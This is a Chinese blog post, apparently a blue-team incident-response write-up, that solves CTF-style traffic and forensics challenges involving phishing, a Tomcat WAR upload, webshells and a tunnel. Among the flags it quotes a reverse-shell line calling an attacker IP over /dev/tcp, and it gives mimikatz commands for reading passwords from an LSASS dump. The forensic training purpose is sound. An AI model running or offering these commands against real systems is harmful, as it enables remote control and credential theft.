长亭百川云 - 文章详情

蓝队应急响应实战案例(五)恶意流量分析

sspsec

72

2024-06-29

第六章 流量特征分析-小王公司收到的钓鱼邮件-中等

1、下载数据包文件 hacker1.pacapng,分析恶意程序访问了内嵌 URL 获取了 zip 压缩包,该 URL 是什么将该 URL作为 FLAG 提交 FLAG(形式:flag{xxxx.co.xxxx/w0ks//?YO=xxxxxxx}) (无需 http、https);

使用wireshark过滤出http数据包

跟随HTTP数据流

发现在/w0ks//?YO=1702920835 为请求数据包的uri

flag{tsdandassociates.co.sz/w0ks//?YO=1702920835}

2、下载数据包文件 hacker1.pacapng,分析获取到的 zip 压缩包的 MD5 是什么 作为 FLAG 提交 FLAG(形式:flag{md5});

选中数据包右键导出为zip

使用md5进行校验

flag{f17dc5b1c30c512137e62993d1df9b2f}

3、下载数据包文件 hacker1.pacapng,分析 zip 压缩包通过加载其中的 javascript 文件到另一个域名下载后续恶意程序, 该域名是什么?提交答案:flag{域名}(无需 http、https)

将js文件中的注释字符去除 发现url

flag{shakyastatuestrade.com}

第六章 流量特征分析-常见攻击事件 tomcat-中等

简介

1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}

查看HTTP协议数据包 发现14.0.0.120 在上传war包

flag{14.0.0.120}

2、找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}

在微步查看 发现是广州市

flag{guangzhou}

3、哪一个端口提供对web服务器管理面板的访问?flag格式:flag{2222}

查看数据包可知是8080 端口

flag{8080}

4、经过前面对攻击者行为的分析后,攻击者运用的工具是?flag格式:flag{名称}

查看数据包UA头 可知使用的是gobuster

flag{gobuster}

5、攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码?flag格式:flag{root-123}

找到上传war 包的 数据包 查看

tomcat的账号密码为admin:tomcat

flag{admin-tomcat}

6、攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称?flag格式:flag{114514.txt}

还是在上传war包的POST数据包中 可以找到上传的文件名

flag{JXQOZY.war}

7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息?flag提示,某种任务里的信息

计划任务中的信息

执行反弹shell

flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}

第六章 流量特征分析-waf 上的截获的黑客攻击流量-中等

简介

应急响应工程师小徐在 waf 上下载了一段黑客的攻击流量,请你分析黑客的攻击流量,并且找到对应的关键信息提供给应急小组协助修复漏洞

1.黑客成功登录系统的密码 flag{xxxxxxxxxxxxxxx}

打开流量包过滤出HTTP协议数据包

找到POST数据包 可以发现使用用户名和密码登录成功

发现跳转到http://192.168.32.189/admin/index.php 这是登陆成功的表现

过滤规则

http.location == "[http://192.168.32.189/admin/index.php](http://192.168.32.189/admin/index.php)"

一共发现5条登录成功数据包

在其中发现一个admin账号

密码为admin!@#pass123

flag{admin!@#pass123}

2.黑客发现的关键字符串 flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}

strings web.pcap| grep flag

flag{87b7cb79481f317bde90c116cf36084b}

3.黑客找到的数据库密码 flag{xxxxxxxxxxxxxxxx}

发现a.php 翻看a.php的返回包发现 数据库密码

flag{e667jUPvJjXHvEUv}

第六章 流量特征分析-蚂蚁爱上树-中等

简介

@老狼 应急响应小组成员老狼在 waf 上下载了一段流量,请你分析黑客攻击手法,并且解答下面问题

1、管理员Admin账号的密码是什么?

过滤HTTP协议 跟随流 发现在50的时候上传了webshell 并且执行命令

过滤规则

_ws.col.info == "POST /onlineshop/product2.php HTTP/1.1  (application/x-www-form-urlencoded)"

依次进行解密 发现添加了用户admin 密码为Password1

flag{Password1}

2、LSASS.exe的程序进程ID是多少?

查看之前的数据包发现 在进行 hashdump操作

flag{852}

3、用户WIN101的密码是什么?

导出后删除多余字符 后缀改成dmp

使用mimikatz读取密码

sekurlsa::minidump product2.dmp  
sekurlsa::logonpasswords

flag{admin#123}

第六章 流量特征分析-蚁剑流量分析-中等

简介

1.木马的连接密码是多少

数据包过滤HTTP 跟随HTTP数据流

密码为1

flag{1}

2.黑客执行的第一个命令是什么

根据蚁剑流量特点去除前两个字符进行base64解码

可以发现是执行了id命令

flag{id}

3.黑客读取了哪个文件的内容,提交文件绝对路径

继续查看数据流在第2个流 发现了/etc/passwd内容 可以判断读取了/etc/passwd

flag{/etc/passwd}

4.黑客上传了什么文件到服务器,提交文件名

上传的文件为flag.txt

flag{flag.txt}

5.黑客上传的文件内容是什么

666C61677B77726974655F666C61677D0A hex解码

flag{write_flag}

6.黑客下载了哪个文件,提交文件绝对路径

flag{/var/www/html/config.php}

第七章 常见攻击事件分析--钓鱼邮件-中等

简介

请勿在本机运行恶意文件样本 请勿在本机运行恶意文件样本 请勿在本机运行恶意文件样本 小张的公司最近遭到了钓鱼邮件攻击,多名员工的终端被控制做为跳板攻击了内网系统,请对钓鱼邮件样本和内网被攻陷的系统进行溯源分析,请根据小张备份的数据样本分析 请勿在本机运行恶意文件样本 请勿在本机运行恶意文件样本 请勿在本机运行恶意文件样本!!!!!

1、请分析获取黑客发送钓鱼邮件时使用的IP,flag格式:flag{11.22.33.44}

使用vscode打开邮件

在邮件中找到发送钓鱼邮件的IP

flag{121.204.224.15}

2、请分析获取黑客钓鱼邮件中使用的木马程序的控制端IP,flag格式:flag{11.22.33.44}

将邮件上传到微步云沙箱 发现外联IP

flag{107.16.111.57}

3、黑客在被控服务器上创建了webshell,请分析获取webshell的文件名,请使用完整文件格式,flag格式:flag{/var/www/html/shell.php}

使用find命令查找webshell

find ./ -name "*.php" | xargs grep --color=auto "eval"

flag{/var/www/html/admin/ebak/ReData.php}

4、flag4: 黑客在被控服务器上创建了内网代理隐蔽通信隧道,请分析获取该隧道程序的文件名,请使用完整文件路径,flag格式:flag{/opt/apache2/shell}

在tmp目录下 发现本不应出现在这里的mysql及其配置文件,为异常点

查看my.conf发现为frp的配置文件,那么mysql毋庸置疑是frpc了

flag{/var/tmp/proc/mysql}
相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2